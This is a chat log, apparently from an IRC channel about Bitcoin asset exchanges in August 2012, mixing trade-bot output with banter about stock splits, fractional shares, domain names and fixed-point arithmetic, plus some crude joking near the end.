GLBSE (might take a while). Aug 28 17:26:54 DMC [1@0.01111111BTC] paid: 0.02635814 BTC. Last price: 0.06 BTC. Capital gain: 0.04888889 BTC. Total: 0.07524703 BTC. (677.2%) Aug 28 17:27:23 !pl MPOE.ETF 0.1 Aug 28 17:27:24 Requesting data from GLBSE (might take a while). Aug 28 17:27:29 MPOE.ETF [1@0.1BTC] paid: 0.0104835 BTC. Last price: 1.3 BTC. Capital gain: 1.2 BTC. Total: 1.2104835 BTC. (1210.5%) Aug 28 17:27:32 that's the record. Aug 28 17:30:51 [GLBSE] [PUREMINING] 2 @ 0.09709999 = 0.1942 BTC [-] Aug 28 17:32:20 [GLBSE] [PUREMINING] 40 @ 0.0972 = 3.888 BTC [+] Aug 28 17:33:44 [GLBSE] [BDT] 15 @ 1.04998 = 15.7497 BTC [+] Aug 28 17:33:46 [GLBSE] [BDT] 5 @ 1.04999899 = 5.25 BTC [+] Aug 28 17:33:47 [GLBSE] [BDT] 2 @ 1.04999999 = 2.1 BTC [+] Aug 28 17:34:09 !pl S.BVPS 0.0032 Aug 28 17:34:09 Requesting data from GLBSE (might take a while). Aug 28 17:34:14 oh its glbse only Aug 28 17:34:15 GLBSE 404 Aug 28 17:35:26 !pl BIB.BVPS 0.0032 Aug 28 17:35:27 Requesting data from GLBSE (might take a while). Aug 28 17:35:35 BIB.BVPS [1@0.0032BTC] paid: 0.00015143 BTC. Last price: 0.004 BTC. Capital gain: 0.0008 BTC. Total: 0.00095143 BTC. (29.7%) Aug 28 17:36:44 [GLBSE] [MOORE] 11 @ 0.4999 = 5.4989 BTC [-] Aug 28 17:37:04 [GLBSE] [MOORE] 1 @ 0.5 BTC [+] Aug 28 17:37:10 [MPEX] [S.MPOE] 200 @ 0.00038795 = 0.0776 BTC [+] Aug 28 17:37:12 [MPEX] [S.MPOE] 18009 @ 0.00038844 = 6.9954 BTC [+] Aug 28 17:37:13 [MPEX] [S.MPOE] 5691 @ 0.00038862 = 2.2116 BTC [+] Aug 28 17:37:45 [GLBSE] [BDK.BND] 1 @ 0.10099 BTC [+] Aug 28 17:43:02 [GLBSE] [ASICMINER] 1 @ 0.10989 BTC [-] Aug 28 17:44:10 [GLBSE] [OBSI.HRPT] 8 @ 0.10499 = 0.8399 BTC [+] Aug 28 17:45:19 http://smpake.com/temp/links_preview.png Aug 28 17:46:32 per week ? Aug 28 17:46:44 ya Aug 28 17:47:07 o if they take a long time to send money ? Aug 28 17:47:07 and txes are free Aug 28 17:47:20 this is a perma link Aug 28 17:47:35 you can send anytime any amount Aug 28 17:47:39 to addy x Aug 28 17:47:50 and youll get it after y confirms Aug 28 17:47:54 to addy z Aug 28 17:48:03 [GLBSE] [TYGRR.BOND-P] 119 @ 0.269 = 32.011 BTC [-] Aug 28 17:48:04 [GLBSE] [TYGRR.BOND-P] 1 @ 0.21000002 BTC [-] Aug 28 17:48:06 [GLBSE] [TYGRR.BOND-P] 24 @ 0.21000001 = 5.04 BTC [-] Aug 28 17:48:07 so who pays the weekly fee ? Aug 28 17:48:07 [GLBSE] [TYGRR.BOND-P] 25 @ 0.21 = 5.25 BTC [-] Aug 28 17:48:08 [GLBSE] [TYGRR.BOND-P] 21 @ 0.20934901 = 4.3963 BTC [-] Aug 28 17:48:08 [GLBSE] [TYGRR.BOND-P] 20 @ 0.20000001 = 4 BTC [-] Aug 28 17:48:09 [GLBSE] [TYGRR.BOND-P] 1 @ 0.2 BTC [-] Aug 28 17:48:10 [GLBSE] [TYGRR.BOND-P] 50 @ 0.2 = 10 BTC [-] Aug 28 17:48:12 [GLBSE] [TYGRR.BOND-P] 5 @ 0.2 = 1 BTC [-] Aug 28 17:48:13 sender of the funds Aug 28 17:48:22 but it's weekly... Aug 28 17:48:31 you make first tx Aug 28 17:48:33 you pay fee Aug 28 17:48:34 ya Aug 28 17:48:39 then 3 weeks later ? Aug 28 17:48:40 and for next 7 days Aug 28 17:48:44 there is no fee Aug 28 17:48:51 if you send after 8 days Aug 28 17:48:53 you get fee again Aug 28 17:48:55 aha! Aug 28 17:49:06 interesting concept Aug 28 17:49:20 also after 1 week the priority goes down Aug 28 17:49:40 until you send tx through it again Aug 28 17:49:52 i c Aug 28 17:49:55 [GLBSE] [YARR] 83 @ 0.99998989 = 82.9992 BTC [+] Aug 28 17:49:55 then it bounces back to high priority Aug 28 17:49:56 [GLBSE] [YARR] 34 @ 0.9999899 = 33.9997 BTC [+] Aug 28 17:49:57 [GLBSE] [YARR] 3 @ 0.9999989 = 3 BTC [+] Aug 28 17:50:37 [MPEX] [S.DICE] 1200 @ 0.0034 = 4.08 BTC [+] Aug 28 17:51:14 [GLBSE] [CPA] 48 @ 0.089 = 4.272 BTC [-] Aug 28 17:51:16 [GLBSE] [CPA] 52 @ 0.09 = 4.68 BTC [+] Aug 28 17:51:39 [GLBSE] [PPT.A] 1 @ 0.45 BTC [+] Aug 28 17:51:56 [GLBSE] [BDK.BND] 30 @ 0.10099 = 3.0297 BTC [+] Aug 28 17:54:11 [MPEX] [S.MPOE] 200 @ 0.00038822 = 0.0776 BTC [-] Aug 28 17:54:12 [MPEX] [S.MPOE] 17682 @ 0.00038774 = 6.856 BTC [-] Aug 28 17:54:13 [MPEX] [S.MPOE] 42918 @ 0.0003862 = 16.5749 BTC [-] Aug 28 18:01:09 [GLBSE] [JAH] 27 @ 0.15999 = 4.3197 BTC [-] Aug 28 18:01:11 [GLBSE] [JAH] 18 @ 0.16 = 2.88 BTC [+] Aug 28 18:03:24 [GLBSE] [BMF] 50 @ 0.5899 = 29.495 BTC [-] Aug 28 18:03:35 [MPEX] [S.MPOE] 200 @ 0.00038781 = 0.0776 BTC [+] Aug 28 18:03:37 [MPEX] [S.MPOE] 10600 @ 0.00038862 = 4.1194 BTC [+] Aug 28 18:13:27 [GLBSE] [TYGRR.BOND-P] 30 @ 0.17 = 5.1 BTC [-] Aug 28 18:13:29 [GLBSE] [TYGRR.BOND-P] 150 @ 0.16000001 = 24 BTC [-] Aug 28 18:13:30 [GLBSE] [TYGRR.BOND-P] 20 @ 0.15111 = 3.0222 BTC [-] Aug 28 18:14:23 [GLBSE] [BIB.PIRATE] 4 @ 0.2103 = 0.8412 BTC [-] Aug 28 18:14:25 [GLBSE] [BIB.PIRATE] 15 @ 0.2102 = 3.153 BTC [-] Aug 28 18:14:25 [GLBSE] [BIB.PIRATE] 15 @ 0.21 = 3.15 BTC [-] Aug 28 18:14:26 [GLBSE] [BIB.PIRATE] 20 @ 0.2 = 4 BTC [-] Aug 28 18:14:57 [GLBSE] [NYAN.C] 5 @ 0.6 = 3 BTC [-] Aug 28 18:15:51 [GLBSE] [FOO.PPPPT] 3 @ 0.2502001 = 0.7506 BTC [+] Aug 28 18:15:52 [GLBSE] [FOO.PPPPT] 14 @ 0.2501001 = 3.5014 BTC [-] Aug 28 18:15:54 [GLBSE] [FOO.PPPPT] 3 @ 0.25 = 0.75 BTC [-] Aug 28 18:16:05 [GLBSE] [BBBB] 400 @ 0.00025 = 0.1 BTC [-] Aug 28 18:24:47 [GLBSE] [FPGA.CONTRACT] 3 @ 0.045 = 0.135 BTC [-] Aug 28 18:24:49 [GLBSE] [FPGA.CONTRACT] 8 @ 0.040001 = 0.32 BTC [-] Aug 28 18:24:50 [GLBSE] [FPGA.CONTRACT] 100 @ 0.04 = 4 BTC [-] Aug 28 18:28:46 anyone want to buy pirate debt? Aug 28 18:30:10 [GLBSE] [YABMC] 2 @ 0.1389 = 0.2778 BTC [+] Aug 28 18:30:52 *crickets* Aug 28 18:31:31 goat pirate is going for .15 Aug 28 18:31:36 Could be the chance of a lifetime Aug 28 18:31:38 either way :p Aug 28 18:31:50 < mircea_popescu> smickles http://polimedia.us/bitcoin/mpex.php?mpsic=S.BVPS grep "dividends" :p <<< nice Aug 28 18:32:07 [GLBSE] [PUREMINING] 48 @ 0.0828 = 3.9744 BTC [-] Aug 28 18:32:09 [GLBSE] [PUREMINING] 99 @ 0.0827 = 8.1873 BTC [-] Aug 28 18:32:10 [GLBSE] [PUREMINING] 100 @ 0.0825 = 8.25 BTC [-] Aug 28 18:32:13 [GLBSE] [PUREMINING] 100 @ 0.0824 = 8.24 BTC [-] Aug 28 18:32:14 [GLBSE] [PUREMINING] 3 @ 0.0802 = 0.2406 BTC [-] Aug 28 18:32:21 [GLBSE] [TYGRR.BOND-P] 10 @ 0.21 = 2.1 BTC [+] Aug 28 18:32:29 things occur. Aug 28 18:32:37 < bitfoo> yeah, SS needs a stock-split desperately. (hint hint smickles) << i'll see if there is any objection. Do you have a ratio in mind? Aug 28 18:33:02 [GLBSE] [PUREMINING] 16 @ 0.0802 = 1.2832 BTC [-] Aug 28 18:33:03 [GLBSE] [PUREMINING] 34 @ 0.076 = 2.584 BTC [-] Aug 28 18:33:11 1:100 ? Aug 28 18:44:22 [MPEX] [F.GIGA.ETF] 10900 @ 0.00096019 = 10.4661 BTC [+] Aug 28 18:44:23 [MPEX] [F.GIGA.ETF] 3141 @ 0.00096344 = 3.0262 BTC [+] Aug 28 18:45:06 [GLBSE] [FOO.PPPPT] 5 @ 0.2001 = 1.0005 BTC [-] Aug 28 18:45:08 [GLBSE] [FOO.PPPPT] 5 @ 0.2 = 1 BTC [-] Aug 28 18:46:00 [GLBSE] [TYGRR.BOND-P] 6 @ 0.152 = 0.912 BTC [-] Aug 28 18:48:46 [GLBSE] [ARS] 35 @ 0.01343 = 0.4701 BTC [+] Aug 28 18:50:04 [GLBSE] [ARS] 10 @ 0.013 = 0.13 BTC [-] Aug 28 18:54:02 [GLBSE] [GSDPT] 10 @ 0.0034 = 0.034 BTC [+] Aug 28 18:54:27 1 to 100 seems like a good start Aug 28 18:55:21 sounds good Aug 28 18:55:45 usagi, it's going from 7% to 700%. ;) Aug 28 18:56:04 what do you mean? Aug 28 18:56:20 you know, buying at 0.15 hoping to redeem at 1.whatever Aug 28 18:56:25 roughly 700% Aug 28 18:56:52 i'm hedged, so I am fine either way :p Aug 28 18:57:58 mircea_popescu, the stockholm syndrome thing, people are accusing pirate supporters of suffering from stockholm syndrome Aug 28 18:58:14 anyways.. gotta run. bbl. Aug 28 18:59:16 later Aug 28 19:00:28 http://smpake.com/temp/links_preview.png Aug 28 19:00:31 is this clear enough Aug 28 19:00:36 or are you missing anything Aug 28 19:02:27 [MPEX] [S.MPOE] 1700 @ 0.00038727 = 0.6584 BTC [-] Aug 28 19:02:28 [MPEX] [S.MPOE] 14426 @ 0.00038743 = 5.5891 BTC [+] Aug 28 19:02:29 [MPEX] [S.MPOE] 15609 @ 0.00038862 = 6.066 BTC [+] Aug 28 19:02:30 [MPEX] [S.MPOE] 20665 @ 0.00038877 = 8.0339 BTC [+] Aug 28 19:04:04 [GLBSE] [ARS] 3 @ 0.015 = 0.045 BTC [+] Aug 28 19:04:13 dam kakobrekla you stole my design Aug 28 19:04:35 i was going to make smex look pretty similar to that Aug 28 19:04:51 i'll just have to tweak a little bit then Aug 28 19:05:03 ahahaha Aug 28 19:05:10 YOU ALL STOLE MY DESIGNS!!! Aug 28 19:06:09 s.ex woudl be a better name Aug 28 19:06:15 the smickles exchange Aug 28 19:06:32 sex lol Aug 28 19:06:40 come get your fluids people! FLUIDS HERE! Aug 28 19:07:02 usagi: you suggest i spring for a single letter tld? Aug 28 19:07:16 ier Aug 28 19:07:29 is there an .ex ?! Aug 28 19:07:30 single letter domain Aug 28 19:07:38 there could be now Aug 28 19:07:47 if i coughed up hundreds of k Aug 28 19:07:47 can you get .ex as the last 2 letters? Aug 28 19:08:12 ya know, how there is going to be custom tlds Aug 28 19:08:21 there is no .ex Aug 28 19:08:22 like .coke .google etc Aug 28 19:08:27 and new gtld's have to be 3+ Aug 28 19:08:32 oh Aug 28 19:08:38 ya the new ones can't be 2 letter Aug 28 19:08:45 too bad Aug 28 19:08:47 so unless someone makes the Empire of Xerania or something... Aug 28 19:09:20 anyway, if current grown continues for a year or so maybe i get .mpex tld Aug 28 19:09:35 just to register a buncha domains and point them at polimedia.us/bitcoin Aug 28 19:09:45 there is .es Aug 28 19:09:48 smickl.es Aug 28 19:09:54 nice Aug 28 19:10:10 you should get it. Aug 28 19:10:19 i actually tried to get carv.er, but they denied me Aug 28 19:10:24 spanish domain Aug 28 19:11:34 s.exchan.ge Aug 28 19:11:37 :-) Aug 28 19:12:53 [GLBSE] [YABMC] 7 @ 0.1389 = 0.9723 BTC [+] Aug 28 19:12:53 smickles sorry for stealing, must have done it subconsciously Aug 28 19:13:12 maybe you're the same person Aug 28 19:13:18 i think ciuciu might be on to someting here. Aug 28 19:13:35 i used to be schizophrenic, but we are ok now Aug 28 19:15:23 ;;topic Aug 28 19:15:23 Bitcoin asset exchanges: GLBSE https://glbse.com || MPEx http://polimedia.us/mpex || CST https://cryptostocks.com || ICBIT https://icbit.se || list bot commands: !help || Streaming trades only: #bitcoin-assets-trades || a biased message: http://smpake.com/ || Net Chart: http://bit.ly/RMjqah Aug 28 19:16:50 chart has moved Aug 28 19:16:54 network one. Aug 28 19:21:21 [GLBSE] [GMVT-BOT] 15 @ 0.171 = 2.565 BTC [+] Aug 28 19:22:25 oh nifty chart Aug 28 19:22:57 [GLBSE] [GIPPT] 1 @ 0.6499 BTC [-] Aug 28 19:23:22 what changes ? looks the same to me ? Aug 28 19:24:54 [GLBSE] [CIUCIU.BOND] 45 @ 0.1 = 4.5 BTC [+] Aug 28 19:25:15 [MPEX] [S.MPOE] 200 @ 0.00038782 = 0.0776 BTC [-] Aug 28 19:25:17 [MPEX] [S.MPOE] 9949 @ 0.000387 = 3.8503 BTC [-] Aug 28 19:25:17 [MPEX] [S.MPOE] 5790 @ 0.0003862 = 2.2361 BTC [-] Aug 28 19:25:24 well i guess it depends when you last looked Aug 28 19:25:34 you/i Aug 28 19:25:45 :p Aug 28 19:25:47 not sure how often it refreshes Aug 28 19:25:50 i think it had a server reboot Aug 28 19:26:50 [GLBSE] [OBSI.HRPT] 2 @ 0.10499 = 0.21 BTC [+] Aug 28 19:30:08 [GLBSE] [BBBB] 515 @ 0.00025 = 0.1288 BTC [-] Aug 28 19:32:40 [MPEX] [S.BVPS] 84 @ 0.00344763 = 0.2896 BTC [-] Aug 28 19:32:54 omg rg! think of all the chicken! Aug 28 19:33:01 ALMOST THREE DOLLA! Aug 28 19:36:17 .py (100000*0.00330000 + 66687*0.00320000) / 100000000 Aug 28 19:36:18 [GLBSE] [POLY.10.1] 7 @ 1.149 = 8.043 BTC [+] Aug 28 19:36:21 5.433984e-06 Aug 28 19:36:22 [GLBSE] [GSDPT] 10000 @ 0.0034 = 34 BTC [+] Aug 28 19:36:29 .py (100000*0.00330000 + 66687*0.00320000) Aug 28 19:36:30 543.3984 Aug 28 19:37:44 [GLBSE] [GSDPT] 2000 @ 0.0034 = 6.8 BTC [+] Aug 28 19:38:07 [GLBSE] [GIGAMINING] 2 @ 0.9199 = 1.8398 BTC [-] Aug 28 19:39:32 [GLBSE] [GSDPT] 390 @ 0.0034 = 1.326 BTC [+] Aug 28 19:41:29 [MPEX] [F.GIGA.ETF] 12196 @ 0.000965 = 11.7691 BTC [+] Aug 28 19:43:44 [GLBSE] [GIGAMINING] 100 @ 0.92 = 92 BTC [+] Aug 28 19:44:08 [GLBSE] [TYGRR.BOND-P] 1 @ 0.2097 BTC [+] Aug 28 19:46:06 [GLBSE] [ASICMINER] 37 @ 0.1081 = 3.9997 BTC [-] Aug 28 19:46:08 [GLBSE] [ASICMINER] 50 @ 0.108 = 5.4 BTC [-] Aug 28 19:46:42 [GLBSE] [GSDPT] 250 @ 0.0034 = 0.85 BTC [+] Aug 28 19:46:48 [MPEX] [S.MPOE] 200 @ 0.00038777 = 0.0776 BTC [+] Aug 28 19:46:49 [MPEX] [S.MPOE] 29435 @ 0.00038877 = 11.4434 BTC [+] Aug 28 19:46:51 [MPEX] [S.MPOE] 28300 @ 0.0003888 = 11.003 BTC [+] Aug 28 19:46:51 [MPEX] [S.MPOE] 12764 @ 0.00038886 = 4.9634 BTC [+] Aug 28 19:46:52 [MPEX] [S.MPOE] 27600 @ 0.00038887 = 10.7328 BTC [+] Aug 28 19:46:53 [MPEX] [S.MPOE] 36300 @ 0.00038891 = 14.1174 BTC [+] Aug 28 19:46:54 [MPEX] [S.MPOE] 12367 @ 0.00038978 = 4.8204 BTC [+] Aug 28 19:46:56 [MPEX] [S.MPOE] 20887 @ 0.00038995 = 8.1449 BTC [+] Aug 28 19:46:57 [MPEX] [S.MPOE] 18300 @ 0.00038997 = 7.1365 BTC [+] Aug 28 19:46:58 [MPEX] [S.MPOE] 22312 @ 0.00039045 = 8.7117 BTC [+] Aug 28 19:46:59 [MPEX] [S.MPOE] 20500 @ 0.0003909 = 8.0135 BTC [+] Aug 28 19:47:00 [MPEX] [S.MPOE] 31900 @ 0.00039092 = 12.4703 BTC [+] Aug 28 19:47:00 [MPEX] [S.MPOE] 27300 @ 0.00039095 = 10.6729 BTC [+] Aug 28 19:47:01 [MPEX] [S.MPOE] 14609 @ 0.00039129 = 5.7164 BTC [+] Aug 28 19:47:02 [MPEX] [S.MPOE] 8166 @ 0.00039187 = 3.2 BTC [+] Aug 28 19:47:03 [MPEX] [S.MPOE] 38300 @ 0.00039258 = 15.0358 BTC [+] Aug 28 19:47:04 [MPEX] [S.MPOE] 43200 @ 0.00039365 = 17.0057 BTC [+] Aug 28 19:47:05 [MPEX] [S.MPOE] 7560 @ 0.00039492 = 2.9856 BTC [+] Aug 28 19:50:56 [MPEX] [S.DICE] 900 @ 0.0033 = 2.97 BTC [-] Aug 28 19:53:07 We need a minimum trade amount. Aug 28 19:53:27 I am sick of people tossing in pennies thinking they are doing something productive Aug 28 19:53:59 Let's not turn this into a elite Aug 28 19:54:18 You already have the traditional stock exchanges for that Aug 28 19:54:50 Lets allow people to exchange what they can afford Aug 28 19:57:18 [GLBSE] [HYDRO.BONDS] 1 @ 1.5499 BTC [-] Aug 28 19:57:20 [GLBSE] [HYDRO.BONDS] 10 @ 1.55 = 15.5 BTC [+] Aug 28 19:57:47 [MPEX] [F.GIGA.ETF] 4504 @ 0.000965 = 4.3464 BTC [+] Aug 28 19:57:49 [MPEX] [F.GIGA.ETF] 1400 @ 0.00096542 = 1.3516 BTC [+] Aug 28 19:57:50 [MPEX] [F.GIGA.ETF] 5400 @ 0.00096686 = 5.221 BTC [+] Aug 28 19:57:51 [MPEX] [F.GIGA.ETF] 4096 @ 0.00096687 = 3.9603 BTC [+] Aug 28 19:59:02 [GLBSE] [DMC] 5 @ 0.06 = 0.3 BTC [-] Aug 28 20:00:02 [GLBSE] [BITBOND] 20 @ 0.46799 = 9.3598 BTC [+] Aug 28 20:03:22 [GLBSE] [GIGAMINING] 15 @ 0.94389 = 14.1584 BTC [+] Aug 28 20:07:05 [GLBSE] [GIGAMINING] 1 @ 0.94389 BTC [+] Aug 28 20:07:11 evoorhees: What's the deadline on the remaining shares? Aug 28 20:09:43 Lets allow people to exchange what they can afford << ++ Aug 28 20:09:50 what's this, about 3 btc trades ? let ppl be omg! Aug 28 20:10:36 Well, you can do as you like Aug 28 20:10:48 o btw, to whomever it may concern : mpex deposits got rid of the leading digit, it;'s always a 0 nao. Aug 28 20:10:54 I think that lowering the barrier is good Aug 28 20:11:13 rdponticelli this is why i say share prices should be 10^-2 to 10^-5 or so Aug 28 20:11:20 At least, as long as the system can deal with it Aug 28 20:11:49 Yes, that's just another thing I like about mpex Aug 28 20:12:29 Good granularity Aug 28 20:13:23 people aren't doing too much 1 share trading anyway Aug 28 20:13:33 Average Transaction : 38.00741596 BTC Aug 28 20:13:35 so myeah. Aug 28 20:13:51 [GLBSE] [TYGRR.BOND-P] 4 @ 0.2097 = 0.8388 BTC [+] Aug 28 20:13:53 [GLBSE] [TYGRR.BOND-P] 50 @ 0.2098 = 10.49 BTC [+] Aug 28 20:13:54 [GLBSE] [TYGRR.BOND-P] 40 @ 0.21 = 8.4 BTC [+] Aug 28 20:14:14 Yes, that's why there's no need to enforce rules just to push people out Aug 28 20:14:49 The market will be regulating itself as variables changes Aug 28 20:14:54 maybe im missing something here. Aug 28 20:15:50 Did you read Emmanuel comments? Aug 28 20:15:59 I was answering them Aug 28 20:16:05 Hmmm Aug 28 20:16:25 We need a minimum trade amount. Aug 28 20:16:25 I am sick of people tossing in pennies thinking they are doing something productive Aug 28 20:16:29 What Evoorhees should of done was got rid of the extra zero Aug 28 20:17:07 I just don't agree Aug 28 20:17:46 And if btc really keeps going up those pennies would be no pennies no more... Aug 28 20:18:00 o o Aug 28 20:18:17 yeah tbh i think things are fine as they are. Aug 28 20:18:29 [MPEX] [S.DICE] 2500 @ 0.0034 = 8.5 BTC [+] Aug 28 20:20:03 [GLBSE] [GSDPT] 50 @ 0.0034 = 0.17 BTC [+] Aug 28 20:20:04 Think about it. Aug 28 20:20:14 Somebody would buy 2000 shares either way Aug 28 20:20:17 [GLBSE] [KRAKEN] 4 @ 0.01 = 0.04 BTC Aug 28 20:20:55 why not double or quadruple that power? Aug 28 20:20:55 Today Aug 28 20:21:08 The whole point is for evoorhees to get funding Aug 28 20:21:17 Maybe in 10 years somebody just sell 1 share of those 2000 Aug 28 20:21:32 And buys a yate xD Aug 28 20:21:59 Lets be optimistic Aug 28 20:22:02 You're not being very pragmatic. Evoorhees has 8 million shares left to sell and the problem might be pricing Aug 28 20:22:17 Now they will have to be withdrawn Aug 28 20:22:26 Yea, maybe pricing is too high Aug 28 20:22:27 EmanuelDeOrtego i think the "someone would buy 2000 shares either way" is flat wrong Aug 28 20:22:41 It has already been discussed Aug 28 20:23:03 someone would buy 7 btc worth of shares no matter what they're priced at. Aug 28 20:23:05 But it has nothing to do with the total number of shares Aug 28 20:23:20 You're probably right Aug 28 20:23:23 I honestly don't see why we need whole numbers of shares Aug 28 20:23:43 Because of tradition? Aug 28 20:23:58 [GLBSE] [MERGEDMINING] 12 @ 0.087798 = 1.0536 BTC [+] Aug 28 20:24:03 break from tradition! Aug 28 20:24:08 we don't have share certificates Aug 28 20:24:09 Yea Aug 28 20:24:21 copumpkin same reason we have whole number of bitocins. Aug 28 20:24:22 precision. Aug 28 20:24:52 But it's all about changing what can be changed, without breaking everything else Aug 28 20:24:57 but I can send you a tiny fraction of a bitcoin if I choose Aug 28 20:24:58 having a unit is fine Aug 28 20:25:01 make it subdivisble though Aug 28 20:25:11 [GLBSE] [DMC] 20 @ 0.06 = 1.2 BTC [-] Aug 28 20:25:33 copumpkin you can not send me a fraction of satoshi. Aug 28 20:25:39 sure Aug 28 20:25:41 that's the unit. Aug 28 20:25:45 If you make shares divisible, you break people's minds Aug 28 20:25:47 this entire bitcoin thing is just fud. Aug 28 20:25:56 I wouldn't say that Aug 28 20:25:59 satoshi is what it is. Aug 28 20:26:16 "A bitcoin" is about as meaningful as "a barrel of cryptotripes" Aug 28 20:26:18 the point is to have something which can change in either direction Aug 28 20:26:39 you pick enough precision to be divisible in either direction Aug 28 20:26:56 Yea, but the point is having something that people still understand, also Aug 28 20:27:07 it really isn't that hard to imagine buying half a share Aug 28 20:27:10 or 1/10 of one Aug 28 20:27:23 http://www.theregister.co.uk/2012/08/27/disable_java_to_block_exploit/ Aug 28 20:27:26 Not for you, not for me Aug 28 20:27:30 TAKE DOWN ALL JAVA NAO! Aug 28 20:27:33 im not even kidding. Aug 28 20:27:40 I never run it anyway Aug 28 20:27:44 me either. Aug 28 20:27:49 except for work Aug 28 20:27:53 but oh well Aug 28 20:31:34 it really isn't that hard to imagine buying half a share << what's hard to imagine is the benefit of doing so. Aug 28 20:31:44 [GLBSE] [GIGAMINING] 15 @ 0.94389 = 14.1584 BTC [+] Aug 28 20:32:35 1 share is valued at $100. You need $50 Aug 28 20:32:40 You sell half a share Aug 28 20:32:43 Get $50 Aug 28 20:33:46 You also don't have to use long ass decimals from the start Aug 28 20:33:48 [GLBSE] [BITBOND] 1 @ 0.46799 BTC [+] Aug 28 20:34:33 [GLBSE] [HYDRO.BONDS] 20 @ 1.59 = 31.8 BTC [+] Aug 28 20:34:46 no Aug 28 20:34:46 1 share should never be valued at $100. Aug 28 20:34:58 do a split, now you own 100 shares of $1. problem solved. Aug 28 20:35:16 also, in binary .5 is a very long ass decimal. Aug 28 20:35:50 Apple is valued at $600 Aug 28 20:36:10 per share Aug 28 20:36:48 [GLBSE] [YABMC] 2 @ 0.1389 = 0.2778 BTC [+] Aug 28 20:36:55 thats crazy Aug 28 20:37:31 ya, they don't know how to run that exchange. Aug 28 20:37:51 It makes sense if you think about it Aug 28 20:37:53 [MPEX] [S.DICE] 500 @ 0.0034 = 1.7 BTC [+] Aug 28 20:38:05 Only people who value Apple are going to buy it Aug 28 20:38:16 The stock doesn't go into weak hands who will throw it away easily Aug 28 20:38:21 lol Aug 28 20:38:38 who do you think buys/sells shares one at a time !? Aug 28 20:38:54 That's not my point. Aug 28 20:39:16 It's harder to sell 10 $600 shares than it is Aug 28 20:39:26 well i doubt anyone seriously gets fuzzy feelings from he share being 600 rather than .6 Aug 28 20:39:30 to sell 600 $1 shares Aug 28 20:39:33 then again hathaway is what, 50k or something Aug 28 20:39:52 anyone who knows how to trade never would go long on $600 stock when you can buy options for a fraction of the cost, which gives you the option to buy, but not the obligation Aug 28 20:40:20 [GLBSE] [MOVETO.FUND] 1 @ 1.19739576 BTC [+] Aug 28 20:40:30 Berkshire Hathaway Inc. (BRK-A) -NYSE 127,719.98 478.02(0.37%) Aug 28 20:40:38 ahaha. it went up 500 bux. that's +0.x% :D Aug 28 20:41:36 mircea_popescu: you have trouble imagining the benefit of it? a lot of problems become a lot easier if you more outside of the integers Aug 28 20:41:44 optimization problems of various sorts Aug 28 20:42:02 and the question is why restrict it Aug 28 20:42:07 tradition is a stupid reason Aug 28 20:42:23 < mircea_popescu> then again hathaway is what, 50k or something <<< the going rate for a share of anne hathaway is only 50k? Aug 28 20:42:29 ;D Aug 28 20:42:30 those who want integer numbers of shares can keep trading them Aug 28 20:42:40 It would be cool if a company could sell divisions of just 1 share Aug 28 20:42:43 glbse would be able to charge meaningful fees to sellers of shares too, for example Aug 28 20:42:55 although I guess you wouldn't want them to be holding companies Aug 28 20:43:19 copumpkin i'm not moving off int before actual precise real becomes possible in computers. Aug 28 20:43:32 uh, fixed point is all I'm proposing Aug 28 20:43:34 which is what bitcoin does Aug 28 20:43:36 that;s the plain and simple reason. Aug 28 20:43:41 no, bitcoin is an integer. Aug 28 20:43:43 http://www.theregister.co.uk/2012/08/27/disable_java_to_block_exploit/ -- #1 reason why your firewall is useless Aug 28 20:43:45 lol Aug 28 20:43:50 so is fixed point arithmetic ;) Aug 28 20:44:00 so then let's call it int and be done with it :D Aug 28 20:44:12 but you see ? Aug 28 20:44:18 just a matter of labelling really. Aug 28 20:44:22 furthermore, I use infinite-precision reals whenever I feel like it in haskell Aug 28 20:44:26 yes, that's what fixed-point math is Aug 28 20:44:34 shifting the conceptual decimal point Aug 28 20:44:48 so then you can say i use fractionary shares in a fixed-point system with the point fixed at 0 Aug 28 20:44:48 [GLBSE] [YARR] 20 @ 0.9999989 = 20 BTC [+] Aug 28 20:45:12 also infinite precision != precise. Aug 28 20:45:14 mircea_popescu: that's effectively what people are doing, in an ugly way, when they issue one billion shares of a company that's worth 100k Aug 28 20:45:20 ;) Aug 28 20:45:22 why ugly ? Aug 28 20:45:37 and it's worth 4mn if you're talking dollars tyvm! Aug 28 20:45:45 why is it annoying that zimbabwe had a dozen zeros after common denominations of bills? Aug 28 20:45:57 [19:45:07] also infinite precision != precise. Aug 28 20:46:00 what do you mean there? Aug 28 20:46:02 im sorry, i don't see the problem. let there be zeroes. Aug 28 20:46:13 my baby keeps making Joseph Ducreux poses Aug 28 20:46:18 i mean infinite precision reals are still nothing but asymptotically precise. Aug 28 20:46:27 Can I buy Pi shares of S.DICE? Aug 28 20:46:36 :D Aug 28 20:46:36 [GLBSE] [YARR] 10 @ 0.9999989 = 10 BTC [+] Aug 28 20:46:37 [GLBSE] [YARR] 25 @ 0.9999999 = 25 BTC [+] Aug 28 20:46:42 smickles http://upload.wikimedia.org/wikipedia/commons/f/ff/Ducreuxyawn.jpg ? Aug 28 20:46:44 [GLBSE] [YARR] 35 @ 0.99999998 = 35 BTC [+] Aug 28 20:46:55 rd well you can buy 314151692... Aug 28 20:46:58 mircea_popescu: yup Aug 28 20:47:15 mircea_popescu: they're precise to whatever depth you ask about, which is as much as you can ever hope for, since we don't deal in infinities Aug 28 20:47:22 she'll do that, and then wave at me Aug 28 20:47:45 copumpkin anyways. Aug 28 20:48:06 the entire thing seems really a discussion of semantics at best. Aug 28 20:48:16 semantics is meaning, and I care about meaning :) Aug 28 20:48:25 mkay. Aug 28 20:48:31 Yea, it's a nice point Aug 28 20:48:31 the entire thing seems really a discussion of sterile semantics at best. Aug 28 20:48:41 I like sterility Aug 28 20:48:44 more people should be sterile Aug 28 20:48:53 omg don't go around imposing your sterility on others!! pinko Aug 28 20:49:01 more *women* should be sterile. Aug 28 20:49:08 oh no, more men should be Aug 28 20:49:13 filhy hussies. Aug 28 20:49:22 I intend to sterilize all men but me Aug 28 20:49:22 copumpkin i don't fuck men. Aug 28 20:49:38 so why'd i care about their germs Aug 28 20:50:06 oh I'm not talking about germs, just reproduction Aug 28 20:50:15 we need fewer dumbass parents having dumbass children Aug 28 20:50:22 I shall solve this problem Aug 28 20:50:28 by 1) enacting communism worldwide Aug 28 20:50:31 2) sterilizing most people Aug 28 20:50:35 except for my inner circle Aug 28 20:50:38 ugh Aug 28 20:50:42 it might not be a problem, the dumasses could save the species Aug 28 20:50:43 pay me 10000 btc to join the inner circle Aug 28 20:50:48 copumpkin is such a fail troll. Aug 28 20:50:55 how so? Aug 28 20:51:10 dude, you need to pay that wright guy for guitar lessons Aug 28 20:51:22 even vrag trolls better than you Aug 